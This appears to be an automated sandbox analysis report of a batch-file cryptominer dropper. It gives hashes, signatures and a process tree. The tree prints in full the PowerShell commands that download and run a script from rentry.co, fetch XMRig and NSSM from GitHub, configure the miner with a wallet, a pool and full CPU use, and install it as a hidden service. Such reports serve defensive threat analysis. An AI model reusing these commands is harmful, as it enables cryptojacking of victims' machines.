Analysis

  • max time kernel
    3s
  • max time network
    106s
  • platform
    windows10-1703_x64
  • resource
    win10-20240611-en
  • resource tags

    arch:x64arch:x86image:win10-20240611-enlocale:en-usos:windows10-1703-x64system
  • submitted
    01-07-2024 03:50

General

  • Target

    281991495829507.bat

  • Size

    517B

  • MD5

    ac9d73455d58bfa42f81e718b8c8d6b5

  • SHA1

    60040fff333b7bc09b22e5c013f11b8a99555ed3

  • SHA256

    4a084dd6b556a67848483a5763f8d3eebadc0527f804f102f7f944b23b31cb12

  • SHA512

    ad24994554a8e6bb68f5ca80b1c53379f7a577964165f56d2f6bef14340fec3d0f17d14faa2db4651776a83bd5686f26ee59080ee2a16d0468b8d38504e460b2

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://rentry.co/regele/raw

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/xmrig.zip

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/nssm.zip

Signatures

  • XMRig Miner payload 8 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Blocklisted process makes network request 1 IoCs
  • Stops running service(s) 4 TTPs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Launches sc.exe 4 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 13 IoCs

    Using powershell.exe command.

  • Delays execution with timeout.exe 64 IoCs
  • Kills process with taskkill 1 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 26 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\281991495829507.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4100
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$wc = New-Object System.Net.WebClient; $tempfile = [System.IO.Path]::GetTempFileName(); $tempfile += '.bat'; $wc.DownloadFile('https://rentry.co/regele/raw', $tempfile); & $tempfile 42cRnHwcKM6bmza8jmWyvWB2tjAcxQGmJ1QHhJ9ae55qRx488q6cvAU42EKkEiEd2N9TE1UjNViUSNVqV1NJ17R79fDhjVL; Remove-Item -Force $tempfile"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2560
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpCCF5.tmp.bat" 42cRnHwcKM6bmza8jmWyvWB2tjAcxQGmJ1QHhJ9ae55qRx488q6cvAU42EKkEiEd2N9TE1UjNViUSNVqV1NJ17R79fDhjVL"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1300
        • C:\Windows\system32\net.exe
          net session
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:3172
          • C:\Windows\system32\net1.exe
            C:\Windows\system32\net1 session
            5⤵
              PID:2356
          • C:\Windows\system32\where.exe
            where powershell
            4⤵
              PID:1264
            • C:\Windows\system32\where.exe
              where find
              4⤵
                PID:1764
              • C:\Windows\system32\where.exe
                where findstr
                4⤵
                  PID:4172
                • C:\Windows\system32\where.exe
                  where tasklist
                  4⤵
                    PID:4556
                  • C:\Windows\system32\where.exe
                    where sc
                    4⤵
                      PID:2216
                    • C:\Windows\system32\sc.exe
                      sc stop moneroocean_miner
                      4⤵
                      • Launches sc.exe
                      PID:1864
                    • C:\Windows\system32\sc.exe
                      sc delete moneroocean_miner
                      4⤵
                      • Launches sc.exe
                      PID:2296
                    • C:\Windows\system32\taskkill.exe
                      taskkill /f /t /im xmrig.exe
                      4⤵
                      • Kills process with taskkill
                      • Suspicious use of AdjustPrivilegeToken
                      PID:3516
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      powershell -Command "$wc = New-Object System.Net.WebClient; $wc.DownloadFile('https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/xmrig.zip', 'C:\Users\Admin\xmrig.zip')"
                      4⤵
                      • Command and Scripting Interpreter: PowerShell
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2388
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      powershell -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:\Users\Admin\xmrig.zip', 'C:\Users\Admin\moneroocean')"
                      4⤵
                      • Command and Scripting Interpreter: PowerShell
                      PID:2808
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"donate-level\": *\d*,', '\"donate-level\": 1,'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
                      4⤵
                      • Command and Scripting Interpreter: PowerShell
                      PID:4068
                    • C:\Users\Admin\moneroocean\xmrig.exe
                      "C:\Users\Admin\moneroocean\xmrig.exe" --help
                      4⤵
                        PID:4484
                      • C:\Windows\system32\cmd.exe
                        C:\Windows\system32\cmd.exe /c powershell -Command "hostname | %{$_ -replace '[^a-zA-Z0-9]+', '_'}"
                        4⤵
                          PID:4456
                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            powershell -Command "hostname | %{$_ -replace '[^a-zA-Z0-9]+', '_'}"
                            5⤵
                            • Command and Scripting Interpreter: PowerShell
                            PID:2624
                            • C:\Windows\system32\HOSTNAME.EXE
                              "C:\Windows\system32\HOSTNAME.EXE"
                              6⤵
                                PID:2376
                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"url\": *\".*\",', '\"url\": \"gulf.moneroocean.stream:10004 \",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
                            4⤵
                            • Command and Scripting Interpreter: PowerShell
                            PID:1628
                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"user\": *\".*\",', '\"user\": \"42cRnHwcKM6bmza8jmWyvWB2tjAcxQGmJ1QHhJ9ae55qRx488q6cvAU42EKkEiEd2N9TE1UjNViUSNVqV1NJ17R79fDhjVL\",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
                            4⤵
                            • Command and Scripting Interpreter: PowerShell
                            PID:2680
                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"pass\": *\".*\",', '\"pass\": \"Gkutwgdf\",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
                            4⤵
                            • Command and Scripting Interpreter: PowerShell
                            PID:2136
                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"max-cpu-usage\": *\d*,', '\"max-cpu-usage\": 100,'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
                            4⤵
                            • Command and Scripting Interpreter: PowerShell
                            PID:2976
                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"log-file\": *null,', '\"log-file\": \"C:\\Users\\Admin\\moneroocean\\xmrig.log\",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
                            4⤵
                            • Command and Scripting Interpreter: PowerShell
                            PID:3556
                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config_background.json' | %{$_ -replace '\"background\": *false,', '\"background\": true,'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config_background.json'"
                            4⤵
                            • Command and Scripting Interpreter: PowerShell
                            PID:4932
                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            powershell -Command "$wc = New-Object System.Net.WebClient; $wc.DownloadFile('https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/nssm.zip', 'C:\Users\Admin\nssm.zip')"
                            4⤵
                            • Command and Scripting Interpreter: PowerShell
                            PID:4292
                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            powershell -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:\Users\Admin\nssm.zip', 'C:\Users\Admin\moneroocean')"
                            4⤵
                            • Command and Scripting Interpreter: PowerShell
                            PID:4512
                          • C:\Windows\system32\sc.exe
                            sc stop moneroocean_miner
                            4⤵
                            • Launches sc.exe
                            PID:212
                          • C:\Windows\system32\sc.exe
                            sc delete moneroocean_miner
                            4⤵
                            • Launches sc.exe
                            PID:2256
                          • C:\Users\Admin\moneroocean\nssm.exe
                            "C:\Users\Admin\moneroocean\nssm.exe" install moneroocean_miner "C:\Users\Admin\moneroocean\xmrig.exe"
                            4⤵
                              PID:1640
                            • C:\Users\Admin\moneroocean\nssm.exe
                              "C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppDirectory "C:\Users\Admin\moneroocean"
                              4⤵
                                PID:2084
                              • C:\Users\Admin\moneroocean\nssm.exe
                                "C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppPriority BELOW_NORMAL_PRIORITY_CLASS
                                4⤵
                                  PID:3960
                                • C:\Users\Admin\moneroocean\nssm.exe
                                  "C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppStdout "C:\Users\Admin\moneroocean\stdout"
                                  4⤵
                                    PID:748
                                  • C:\Users\Admin\moneroocean\nssm.exe
                                    "C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppStderr "C:\Users\Admin\moneroocean\stderr"
                                    4⤵
                                      PID:4784
                                    • C:\Users\Admin\moneroocean\nssm.exe
                                      "C:\Users\Admin\moneroocean\nssm.exe" start moneroocean_miner
                                      4⤵
                                        PID:5048
                                  • C:\Windows\system32\cmd.exe
                                    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                    2⤵
                                      PID:3952
                                      • C:\Windows\System32\Wbem\WMIC.exe
                                        wmic cpu get loadpercentage
                                        3⤵
                                          PID:3156
                                      • C:\Windows\system32\timeout.exe
                                        timeout /t 1
                                        2⤵
                                        • Delays execution with timeout.exe
                                        PID:4236
                                      • C:\Windows\system32\cmd.exe
                                        C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                        2⤵
                                          PID:2144
                                          • C:\Windows\System32\Wbem\WMIC.exe
                                            wmic cpu get loadpercentage
                                            3⤵
                                              PID:32
                                          • C:\Windows\system32\timeout.exe
                                            timeout /t 1
                                            2⤵
                                            • Delays execution with timeout.exe
                                            PID:4768
                                          • C:\Windows\system32\cmd.exe
                                            C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                            2⤵
                                              PID:1632
                                              • C:\Windows\System32\Wbem\WMIC.exe
                                                wmic cpu get loadpercentage
                                                3⤵
                                                  PID:1892
                                              • C:\Windows\system32\timeout.exe
                                                timeout /t 1
                                                2⤵
                                                • Delays execution with timeout.exe
                                                PID:3516
                                              • C:\Windows\system32\cmd.exe
                                                C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                2⤵
                                                  PID:4224
                                                  • C:\Windows\System32\Wbem\WMIC.exe
                                                    wmic cpu get loadpercentage
                                                    3⤵
                                                      PID:1852
                                                  • C:\Windows\system32\timeout.exe
                                                    timeout /t 1
                                                    2⤵
                                                    • Delays execution with timeout.exe
                                                    PID:2732
                                                  • C:\Windows\system32\cmd.exe
                                                    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                    2⤵
                                                      PID:3580
                                                      • C:\Windows\System32\Wbem\WMIC.exe
                                                        wmic cpu get loadpercentage
                                                        3⤵
                                                          PID:4920
                                                      • C:\Windows\system32\timeout.exe
                                                        timeout /t 1
                                                        2⤵
                                                        • Delays execution with timeout.exe
                                                        PID:4380
                                                      • C:\Windows\system32\cmd.exe
                                                        C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                        2⤵
                                                          PID:4752
                                                          • C:\Windows\System32\Wbem\WMIC.exe
                                                            wmic cpu get loadpercentage
                                                            3⤵
                                                              PID:3692
                                                          • C:\Windows\system32\timeout.exe
                                                            timeout /t 1
                                                            2⤵
                                                            • Delays execution with timeout.exe
                                                            PID:5112
                                                          • C:\Windows\system32\cmd.exe
                                                            C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                            2⤵
                                                              PID:4032
                                                              • C:\Windows\System32\Wbem\WMIC.exe
                                                                wmic cpu get loadpercentage
                                                                3⤵
                                                                  PID:3676
                                                              • C:\Windows\system32\timeout.exe
                                                                timeout /t 1
                                                                2⤵
                                                                • Delays execution with timeout.exe
                                                                PID:4448
                                                              • C:\Windows\system32\cmd.exe
                                                                C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                2⤵
                                                                  PID:2152
                                                                  • C:\Windows\System32\Wbem\WMIC.exe
                                                                    wmic cpu get loadpercentage
                                                                    3⤵
                                                                      PID:4508
                                                                  • C:\Windows\system32\timeout.exe
                                                                    timeout /t 1
                                                                    2⤵
                                                                    • Delays execution with timeout.exe
                                                                    PID:4608
                                                                  • C:\Windows\system32\cmd.exe
                                                                    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                    2⤵
                                                                      PID:4164
                                                                      • C:\Windows\System32\Wbem\WMIC.exe
                                                                        wmic cpu get loadpercentage
                                                                        3⤵
                                                                          PID:5020
                                                                      • C:\Windows\system32\timeout.exe
                                                                        timeout /t 1
                                                                        2⤵
                                                                        • Delays execution with timeout.exe
                                                                        PID:192
                                                                      • C:\Windows\system32\cmd.exe
                                                                        C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                        2⤵
                                                                          PID:2040
                                                                          • C:\Windows\System32\Wbem\WMIC.exe
                                                                            wmic cpu get loadpercentage
                                                                            3⤵
                                                                              PID:1144
                                                                          • C:\Windows\system32\timeout.exe
                                                                            timeout /t 1
                                                                            2⤵
                                                                            • Delays execution with timeout.exe
                                                                            PID:3540
                                                                          • C:\Windows\system32\cmd.exe
                                                                            C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                            2⤵
                                                                              PID:768
                                                                              • C:\Windows\System32\Wbem\WMIC.exe
                                                                                wmic cpu get loadpercentage
                                                                                3⤵
                                                                                  PID:3076
                                                                              • C:\Windows\system32\timeout.exe
                                                                                timeout /t 1
                                                                                2⤵
                                                                                • Delays execution with timeout.exe
                                                                                PID:4056
                                                                              • C:\Windows\system32\cmd.exe
                                                                                C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                2⤵
                                                                                  PID:2720
                                                                                  • C:\Windows\System32\Wbem\WMIC.exe
                                                                                    wmic cpu get loadpercentage
                                                                                    3⤵
                                                                                      PID:872
                                                                                  • C:\Windows\system32\timeout.exe
                                                                                    timeout /t 1
                                                                                    2⤵
                                                                                    • Delays execution with timeout.exe
                                                                                    PID:3532
                                                                                  • C:\Windows\system32\cmd.exe
                                                                                    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                    2⤵
                                                                                      PID:2880
                                                                                      • C:\Windows\System32\Wbem\WMIC.exe
                                                                                        wmic cpu get loadpercentage
                                                                                        3⤵
                                                                                          PID:4820
                                                                                      • C:\Windows\system32\timeout.exe
                                                                                        timeout /t 1
                                                                                        2⤵
                                                                                        • Delays execution with timeout.exe
                                                                                        PID:2376
                                                                                      • C:\Windows\system32\cmd.exe
                                                                                        C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                        2⤵
                                                                                          PID:3616
                                                                                          • C:\Windows\System32\Wbem\WMIC.exe
                                                                                            wmic cpu get loadpercentage
                                                                                            3⤵
                                                                                              PID:4476
                                                                                          • C:\Windows\system32\timeout.exe
                                                                                            timeout /t 1
                                                                                            2⤵
                                                                                            • Delays execution with timeout.exe
                                                                                            PID:3528
                                                                                          • C:\Windows\system32\cmd.exe
                                                                                            C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                            2⤵
                                                                                              PID:2952
                                                                                              • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                wmic cpu get loadpercentage
                                                                                                3⤵
                                                                                                  PID:648
                                                                                              • C:\Windows\system32\timeout.exe
                                                                                                timeout /t 1
                                                                                                2⤵
                                                                                                • Delays execution with timeout.exe
                                                                                                PID:5052
                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                2⤵
                                                                                                  PID:1392
                                                                                                  • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                    wmic cpu get loadpercentage
                                                                                                    3⤵
                                                                                                      PID:4252
                                                                                                  • C:\Windows\system32\timeout.exe
                                                                                                    timeout /t 1
                                                                                                    2⤵
                                                                                                    • Delays execution with timeout.exe
                                                                                                    PID:1328
                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                    2⤵
                                                                                                      PID:3216
                                                                                                      • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                        wmic cpu get loadpercentage
                                                                                                        3⤵
                                                                                                          PID:2288
                                                                                                      • C:\Windows\system32\timeout.exe
                                                                                                        timeout /t 1
                                                                                                        2⤵
                                                                                                        • Delays execution with timeout.exe
                                                                                                        PID:1640
                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                        C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                        2⤵
                                                                                                          PID:1628
                                                                                                          • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                            wmic cpu get loadpercentage
                                                                                                            3⤵
                                                                                                              PID:4744
                                                                                                          • C:\Windows\system32\timeout.exe
                                                                                                            timeout /t 1
                                                                                                            2⤵
                                                                                                            • Delays execution with timeout.exe
                                                                                                            PID:3136
                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                            C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                            2⤵
                                                                                                              PID:4968
                                                                                                              • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                wmic cpu get loadpercentage
                                                                                                                3⤵
                                                                                                                  PID:4284
                                                                                                              • C:\Windows\system32\timeout.exe
                                                                                                                timeout /t 1
                                                                                                                2⤵
                                                                                                                • Delays execution with timeout.exe
                                                                                                                PID:1216
                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                2⤵
                                                                                                                  PID:3028
                                                                                                                  • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                    wmic cpu get loadpercentage
                                                                                                                    3⤵
                                                                                                                      PID:992
                                                                                                                  • C:\Windows\system32\timeout.exe
                                                                                                                    timeout /t 1
                                                                                                                    2⤵
                                                                                                                    • Delays execution with timeout.exe
                                                                                                                    PID:2356
                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                    2⤵
                                                                                                                      PID:516
                                                                                                                      • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                        wmic cpu get loadpercentage
                                                                                                                        3⤵
                                                                                                                          PID:4720
                                                                                                                      • C:\Windows\system32\timeout.exe
                                                                                                                        timeout /t 1
                                                                                                                        2⤵
                                                                                                                        • Delays execution with timeout.exe
                                                                                                                        PID:4728
                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                        C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                        2⤵
                                                                                                                          PID:4492
                                                                                                                          • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                            wmic cpu get loadpercentage
                                                                                                                            3⤵
                                                                                                                              PID:4780
                                                                                                                          • C:\Windows\system32\timeout.exe
                                                                                                                            timeout /t 1
                                                                                                                            2⤵
                                                                                                                            • Delays execution with timeout.exe
                                                                                                                            PID:1676
                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                            C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                            2⤵
                                                                                                                              PID:1608
                                                                                                                              • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                wmic cpu get loadpercentage
                                                                                                                                3⤵
                                                                                                                                  PID:4792
                                                                                                                              • C:\Windows\system32\timeout.exe
                                                                                                                                timeout /t 1
                                                                                                                                2⤵
                                                                                                                                • Delays execution with timeout.exe
                                                                                                                                PID:4500
                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                                2⤵
                                                                                                                                  PID:2120
                                                                                                                                  • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                    wmic cpu get loadpercentage
                                                                                                                                    3⤵
                                                                                                                                      PID:780
                                                                                                                                  • C:\Windows\system32\timeout.exe
                                                                                                                                    timeout /t 1
                                                                                                                                    2⤵
                                                                                                                                    • Delays execution with timeout.exe
                                                                                                                                    PID:2244
                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                                    2⤵
                                                                                                                                      PID:1892
                                                                                                                                      • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                        wmic cpu get loadpercentage
                                                                                                                                        3⤵
                                                                                                                                          PID:2292
                                                                                                                                      • C:\Windows\system32\timeout.exe
                                                                                                                                        timeout /t 1
                                                                                                                                        2⤵
                                                                                                                                        • Delays execution with timeout.exe
                                                                                                                                        PID:4336
                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                        C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                                        2⤵
                                                                                                                                          PID:4224
                                                                                                                                          • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                            wmic cpu get loadpercentage
                                                                                                                                            3⤵
                                                                                                                                              PID:4916
                                                                                                                                          • C:\Windows\system32\timeout.exe
                                                                                                                                            timeout /t 1
                                                                                                                                            2⤵
                                                                                                                                            • Delays execution with timeout.exe
                                                                                                                                            PID:4180
                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                            C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                                            2⤵
                                                                                                                                              PID:4660
                                                                                                                                              • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                wmic cpu get loadpercentage
                                                                                                                                                3⤵
                                                                                                                                                  PID:4112
                                                                                                                                              • C:\Windows\system32\timeout.exe
                                                                                                                                                timeout /t 1
                                                                                                                                                2⤵
                                                                                                                                                • Delays execution with timeout.exe
                                                                                                                                                PID:3424
                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                                                2⤵
                                                                                                                                                  PID:2796
                                                                                                                                                  • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                    wmic cpu get loadpercentage
                                                                                                                                                    3⤵
                                                                                                                                                      PID:980
                                                                                                                                                  • C:\Windows\system32\timeout.exe
                                                                                                                                                    timeout /t 1
                                                                                                                                                    2⤵
                                                                                                                                                    • Delays execution with timeout.exe
                                                                                                                                                    PID:3340
                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                                                    2⤵
                                                                                                                                                      PID:972
                                                                                                                                                      • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                        wmic cpu get loadpercentage
                                                                                                                                                        3⤵
                                                                                                                                                          PID:1052
                                                                                                                                                      • C:\Windows\system32\timeout.exe
                                                                                                                                                        timeout /t 1
                                                                                                                                                        2⤵
                                                                                                                                                        • Delays execution with timeout.exe
                                                                                                                                                        PID:3128
                                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                                        C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                                                        2⤵
                                                                                                                                                          PID:3868
                                                                                                                                                          • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                            wmic cpu get loadpercentage
                                                                                                                                                            3⤵
                                                                                                                                                              PID:1744
                                                                                                                                                          • C:\Windows\system32\timeout.exe
                                                                                                                                                            timeout /t 1
                                                                                                                                                            2⤵
                                                                                                                                                            • Delays execution with timeout.exe
                                                                                                                                                            PID:5016
                                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                                            C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                                                            2⤵
                                                                                                                                                              PID:4612
                                                                                                                                                              • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                wmic cpu get loadpercentage
                                                                                                                                                                3⤵
                                                                                                                                                                  PID:3856
                                                                                                                                                              • C:\Windows\system32\timeout.exe
                                                                                                                                                                timeout /t 1
                                                                                                                                                                2⤵
                                                                                                                                                                • Delays execution with timeout.exe
                                                                                                                                                                PID:948
                                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                                C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                                                                2⤵
                                                                                                                                                                  PID:3972
                                                                                                                                                                  • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                    wmic cpu get loadpercentage
                                                                                                                                                                    3⤵
                                                                                                                                                                      PID:4216
                                                                                                                                                                  • C:\Windows\system32\timeout.exe
                                                                                                                                                                    timeout /t 1
                                                                                                                                                                    2⤵
                                                                                                                                                                    • Delays execution with timeout.exe
                                                                                                                                                                    PID:96
                                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                                    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                                                                    2⤵
                                                                                                                                                                      PID:4212
                                                                                                                                                                      • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                        wmic cpu get loadpercentage
                                                                                                                                                                        3⤵
                                                                                                                                                                          PID:2868
                                                                                                                                                                      • C:\Windows\system32\timeout.exe
                                                                                                                                                                        timeout /t 1
                                                                                                                                                                        2⤵
                                                                                                                                                                        • Delays execution with timeout.exe
                                                                                                                                                                        PID:3168
                                                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                                                        C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                                                                        2⤵
                                                                                                                                                                          PID:5068
                                                                                                                                                                          • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                            wmic cpu get loadpercentage
                                                                                                                                                                            3⤵
                                                                                                                                                                              PID:2748
                                                                                                                                                                          • C:\Windows\system32\timeout.exe
                                                                                                                                                                            timeout /t 1
                                                                                                                                                                            2⤵
                                                                                                                                                                            • Delays execution with timeout.exe
                                                                                                                                                                            PID:1884
                                                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                                                            C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                                                                            2⤵
                                                                                                                                                                              PID:1544
                                                                                                                                                                              • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                wmic cpu get loadpercentage
                                                                                                                                                                                3⤵
                                                                                                                                                                                  PID:4900
                                                                                                                                                                              • C:\Windows\system32\timeout.exe
                                                                                                                                                                                timeout /t 1
                                                                                                                                                                                2⤵
                                                                                                                                                                                • Delays execution with timeout.exe
                                                                                                                                                                                PID:4384
                                                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                                                C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                                                                                2⤵
                                                                                                                                                                                  PID:3912
                                                                                                                                                                                  • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                    wmic cpu get loadpercentage
                                                                                                                                                                                    3⤵
                                                                                                                                                                                      PID:4420
                                                                                                                                                                                  • C:\Windows\system32\timeout.exe
                                                                                                                                                                                    timeout /t 1
                                                                                                                                                                                    2⤵
                                                                                                                                                                                    • Delays execution with timeout.exe
                                                                                                                                                                                    PID:3616
                                                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                                                                                    2⤵
                                                                                                                                                                                      PID:1324
                                                                                                                                                                                      • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                        wmic cpu get loadpercentage
                                                                                                                                                                                        3⤵
                                                                                                                                                                                          PID:3528
                                                                                                                                                                                      • C:\Windows\system32\timeout.exe
                                                                                                                                                                                        timeout /t 1
                                                                                                                                                                                        2⤵
                                                                                                                                                                                        • Delays execution with timeout.exe
                                                                                                                                                                                        PID:5060
                                                                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                                                                                        2⤵
                                                                                                                                                                                          PID:3108
                                                                                                                                                                                          • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                            wmic cpu get loadpercentage
